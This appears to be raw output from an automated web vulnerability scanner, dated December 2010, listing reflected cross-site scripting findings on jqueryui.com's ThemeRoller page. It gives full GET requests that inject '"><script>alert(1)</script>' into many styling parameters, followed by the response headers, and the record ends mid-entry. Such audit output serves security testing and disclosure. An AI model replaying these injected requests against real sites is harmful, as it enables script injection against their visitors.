GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75465c6"><script>alert(1)</script>ee3c1ef3667&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b74b"><script>alert(1)</script>e7031a0cc1 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=554b74b"><script>alert(1)</script>e7031a0cc1&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb22a"><script>alert(1)</script>8dcb00c57c8 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75fb22a"><script>alert(1)</script>8dcb00c57c8&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7294b"><script>alert(1)</script>0b2f30c780e was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=07294b"><script>alert(1)</script>0b2f30c780e&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef8af"><script>alert(1)</script>bb639f52f51 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0ef8af"><script>alert(1)</script>bb639f52f51&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7769a"><script>alert(1)</script>1f24aa516b9 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png7769a"><script>alert(1)</script>1f24aa516b9&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f9a1"><script>alert(1)</script>07a06ed0f2b was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png7f9a1"><script>alert(1)</script>07a06ed0f2b&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:55 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39f6c"><script>alert(1)</script>4d606b712ae was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png39f6c"><script>alert(1)</script>4d606b712ae&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:36:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e1d"><script>alert(1)</script>b0705c51f was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pnge3e1d"><script>alert(1)</script>b0705c51f&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:37:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 119997
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb6ba"><script>alert(1)</script>c860704192d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.pngeb6ba"><script>alert(1)</script>c860704192d&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 12 Dec 2010 14:35:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120001
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5e2"><script>alert(1)</script>5ad0d53056f was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png1e5e2"><script>alert(1)</script>5ad0d53056f&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5eb42"><script>alert(1)</script>d0177921a09 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png5eb42"><script>alert(1)</script>d0177921a09&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a540e"><script>alert(1)</script>2fec129ecd0 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga540e"><script>alert(1)</script>2fec129ecd0&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120001
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7403f"><script>alert(1)</script>521994f8e38 was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
